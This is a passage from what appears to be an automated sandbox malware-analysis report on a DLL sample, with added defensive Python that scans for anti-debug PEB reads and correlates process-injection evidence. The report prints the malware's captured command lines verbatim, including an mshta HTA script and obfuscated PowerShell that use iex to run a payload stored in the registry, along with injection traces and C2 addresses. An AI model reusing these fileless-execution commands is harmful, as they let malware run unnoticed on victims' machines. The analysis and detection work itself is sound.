Source: explorer.exe, 0000001A.00000000.471555007.000000000D462000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
Source: explorer.exe, 0000001A.00000000.471555007.000000000D462000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.487107261.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.509648591.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000029.00000000.632215925.0000021DB5A53000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: loaddll32.exe, 00000001.00000003.446002874.00000000015BC000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000002.522031967.00000000015BC000.00000004.00000020.sdmp, loaddll32.exe, 00000001.00000003.390361194.00000000015BC000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.393979120.00000000015BC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USnl?'
Source: loaddll32.exe, 00000001.00000003.446002874.00000000015BC000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000002.522031967.00000000015BC000.00000004.00000020.sdmp, loaddll32.exe, 00000001.00000003.390361194.00000000015BC000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.393979120.00000000015BC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001A.00000000.467207350.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000001A.00000000.506666605.000000000D462000.00000004.00000001.sdmp Binary or memory string: fb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.506666605.000000000D462000.00000004.00000001.sdmp Binary or memory string: 6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
Source: explorer.exe, 0000001A.00000000.467207350.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001A.00000000.508501495.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 0000001A.00000000.475140198.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Anti Debugging

Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_04B4653E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (2 identical entries)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E00B5 mov ecx, dword ptr fs:[00000030h] 1_2_032E00B5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E0DA5 mov eax, dword ptr fs:[00000030h] 1_2_032E0DA5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E0695 mov eax, dword ptr fs:[00000030h] 1_2_032E0695
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F300B5 mov ecx, dword ptr fs:[00000030h] 3_2_00F300B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F30695 mov eax, dword ptr fs:[00000030h] 3_2_00F30695
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F30DA5 mov eax, dword ptr fs:[00000030h] 3_2_00F30DA5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B38C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_04B38C50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_059E8C50
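The `mov eax/ecx, dword ptr fs:[30h]` hits above read the PEB pointer out of the 32-bit TEB. That read is neutral on its own (the loader and the CRT do it too); what turns it into an anti-debug check is the field read that follows: PEB.BeingDebugged at offset 0x02, NtGlobalFlag at 0x68 (the FLG_HEAP_* bits are set when the process was created under a debugger), or ProcessHeap at 0x18 for a heap-flags check, while Ldr at 0x0C starts the loader-list walk used to resolve APIs without an import table. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: a byte-pattern scanner that finds every fs:[30h] load in a 32-bit code blob (both the short eax-only encoding 64 A1 and the ModRM encoding 64 8B /r) and attributes the next [reg+disp8] access to one of those PEB fields. The input bytes are constructed here to exercise the scanner; the 16-byte window and the ModRM-only match are heuristics of this example, not of any tool.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit PEB fields that debugger checks and hand-rolled import resolution
# read right after fetching the PEB pointer from fs:[30h].
PEB_FIELDS = {
    0x02: "BeingDebugged",
    0x0C: "Ldr",
    0x18: "ProcessHeap",
    0x68: "NtGlobalFlag",
}

# mov r32, dword ptr fs:[30h]: either the short eax-only form (64 A1 disp32)
# or the general form 64 8B /r with mod=00 rm=101 (ModRM 05/0D/15/.../3D).
PEB_LOAD = re.compile(
    rb"\x64(?:\xA1|\x8B(?P<modrm>[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]))\x30\x00\x00\x00"
)
WINDOW = 16  # bytes after the load within which a field read is attributed to it


@dataclass
class PebAccess:
    offset: int            # offset of the fs:[30h] load in the scanned bytes
    reg: str               # register that receives the PEB pointer
    field: Optional[str]   # PEB field read through that register, if one follows


def find_field_read(code: bytes, start: int, reg_idx: int) -> Optional[str]:
    """Look for [reg + disp8] (ModRM mod=01, rm=reg) whose disp8 is a known PEB field.

    Heuristic: the opcode in front of the ModRM byte is not decoded, so data
    bytes can produce false positives, and rm=100 (esp) would need a SIB byte
    that this does not handle; real fs:[30h] loads never target esp.
    """
    window = code[start:start + WINDOW]
    for i in range(len(window) - 1):
        if (window[i] & 0xC7) == (0x40 | reg_idx) and window[i + 1] in PEB_FIELDS:
            return PEB_FIELDS[window[i + 1]]
    return None


def scan_peb_access(code: bytes) -> List[PebAccess]:
    """Return every fs:[30h] load in `code` together with the PEB field read after it."""
    hits = []
    for m in PEB_LOAD.finditer(code):
        modrm = m.group("modrm")
        reg_idx = 0 if modrm is None else (modrm[0] >> 3) & 7   # reg field of ModRM
        hits.append(PebAccess(m.start(), REG32[reg_idx], find_field_read(code, m.end(), reg_idx)))
    return hits


# Constructed sample, not bytes from the analysed DLL: three fs:[30h] loads,
# each followed by the field read a debugger check or loader walk performs.
SAMPLE = bytes.fromhex(
    "64A130000000"    # mov eax, dword ptr fs:[30h]
    "0FB64002"        # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    "85C0"            # test eax, eax
    "7504"            # jne short +4
    "90909090"        # nop x4
    "648B0D30000000"  # mov ecx, dword ptr fs:[30h]
    "8B4168"          # mov eax, [ecx+68h]            ; PEB.NtGlobalFlag
    "83E070"          # and eax, 70h                  ; FLG_HEAP_* debugger bits
    "C3"              # ret
    "648B1530000000"  # mov edx, dword ptr fs:[30h]
    "8B420C"          # mov eax, [edx+0Ch]            ; PEB.Ldr
    "C3"              # ret
)

if __name__ == "__main__":
    for hit in scan_peb_access(SAMPLE):
        print(f"+0x{hit.offset:04x}: PEB -> {hit.reg}, then reads {hit.field or '(no known field in window)'}")
```

Run it over a dump of the unpacked 32-bit payload rather than the packed file on disk: the hits in this report are at runtime addresses inside loaddll32.exe and rundll32.exe, and the static DLL is obfuscated. A load with no field read in the window is worth a look by hand; a load followed by BeingDebugged or NtGlobalFlag is the check itself, and one followed by Ldr is usually the start of manual API resolution.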

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 61.98.7.132 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: giporedtrip.at
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.36.3.134 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 91.203.174.38 80
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write (2 identical entries)
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write (2 identical entries)
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 2C0000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 970000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 5EE000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2800000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 5F6000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: AA0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 5F0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 2820000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACFC000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF6D46D5FD0
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write (4 identical entries)
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 2C0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 970000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 2820000 protect: page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 5EE000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 2800000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: 40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 5F6000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: AA0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: 40
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 5F0000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3440 base: 2820000 value: 80
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 6104
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440 (2 identical entries)
Source: C:\Windows\System32\control.exe Thread register set: target process: 3440 (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580 (2 identical entries)
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 88E31580
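The Memory written, Memory protected, Memory allocated and Thread created lines above are the evidence behind the foreign-memory and remote-thread verdicts for this sample, and they line up on one address: 7FFD88E31580 is written by powershell.exe and control.exe, has its protection changed to execute/read/write by control.exe, and is the start address of the threads created in explorer.exe (the EIP lines print its low 32 bits, 88E31580), and explorer.exe then repeats the same write, protect and thread-create sequence against RuntimeBroker.exe at the same address. The byte-level lines show EB, the x86 opcode for a short jmp, being written there. The Python below is an added example, not Joe Sandbox code and not anything from the sample: a correlator that parses lines in this section's own format, groups them per (target image, address) and grades a site as a full injection when a write, an executable-and-writable protection and a remote thread all land on it. The log excerpt is abridged from lines of this report; the low-32-bit comparison is an assumption about how the report prints the EIP field.

```python
import re
from collections import defaultdict
from typing import Dict, Set, Tuple

# One "Memory written / protected / allocated" or "Thread created" line as the
# report prints it.  The byte-level "Memory written: PID: n base: ... value: xx"
# lines deliberately do not match: their target is a PID, not an image path.
MEM_OP = re.compile(
    r"^Source: (?P<src>\S+) (?P<op>Memory written|Memory protected|Memory allocated|Thread created): "
    r"(?P<target>\S+) (?:base|EIP): (?P<addr>[0-9A-Fa-f]+)(?: protect: (?P<prot>.*))?$"
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_memory_ops(lines):
    ops = []
    for line in lines:
        m = MEM_OP.match(line.replace(" Jump to behavior", "").strip())
        if not m:
            continue
        ops.append({
            "src": basename(m["src"]),
            "op": m["op"],
            "target": basename(m["target"]),
            # Assumption about the report's rendering: "EIP:" shows only the low
            # 32 bits of the address the "base:" lines print in full, so all
            # addresses are reduced to their low 32 bits before correlation.
            "addr": int(m["addr"], 16) & 0xFFFFFFFF,
            "prot": m["prot"] or "",
        })
    return ops


Site = Tuple[str, int]  # (target image, low 32 bits of the address)


def correlate(ops) -> Dict[Site, Tuple[str, Set[str]]]:
    """Group evidence per site and grade it; value is (verdict, injecting images)."""
    sites = defaultdict(lambda: {"write": set(), "rwx": set(), "thread": set()})
    for o in ops:
        s = sites[(o["target"], o["addr"])]
        if o["op"] == "Memory written":
            s["write"].add(o["src"])
        elif o["op"] in ("Memory protected", "Memory allocated") \
                and "execute" in o["prot"] and "write" in o["prot"]:
            s["rwx"].add(o["src"])          # RWX: "page execute read" alone does not count
        elif o["op"] == "Thread created":
            s["thread"].add(o["src"])
    findings = {}
    for site, s in sites.items():
        if s["write"] and s["rwx"] and s["thread"]:
            findings[site] = ("write + RWX + remote thread", s["write"] | s["rwx"] | s["thread"])
        elif s["write"] and s["rwx"]:
            findings[site] = ("write into RWX region", s["write"] | s["rwx"])
    return findings


# Constructed excerpt, abridged from the evidence lines of this report.
LOG = r"""
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 2C0000 protect: page execute and read and write
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 2C0000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF783D812E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB
"""

if __name__ == "__main__":
    for (target, addr), (verdict, actors) in sorted(correlate(parse_memory_ops(LOG.splitlines())).items()):
        print(f"{target} @ 0x{addr:08X}: {verdict} by {', '.join(sorted(actors))}")
```

The control.exe site at 2C0000 only reaches "write into RWX region" because the report records the hand-over to that process as Thread register set rather than Thread created; a production rule would treat a register set on the target PID the same way as a thread start.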
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wulb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wulb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Vn1t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vn1t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9AF.tmp" "c:\Users\user\AppData\Local\Temp\hddjt5kh\CSCAC4C40391E0044BAAD217F7E1F4E48A.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC843.tmp" "c:\Users\user\AppData\Local\Temp\32ysuxeg\CSCDD69F677ABA1437DBA6EE4792C92D38A.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCEBB.tmp" "c:\Users\user\AppData\Local\Temp\qmanv25g\CSC83689403A124ABD8F80AE4A2C14BFB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE6D7.tmp" "c:\Users\user\AppData\Local\Temp\vn3zgr4g\CSCD86376609B0744ABB56928FEBE923C3.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 (2 identical entries)
Source: control.exe, 00000016.00000000.437382489.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.444496558.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.443269478.000002ACC3F70000.00000002.00020000.sdmp, control.exe, 00000016.00000000.441187484.000002ACC3F70000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.482689849.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.468246857.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.473914176.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.507953474.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000000.475878410.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.447472597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.467710961.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 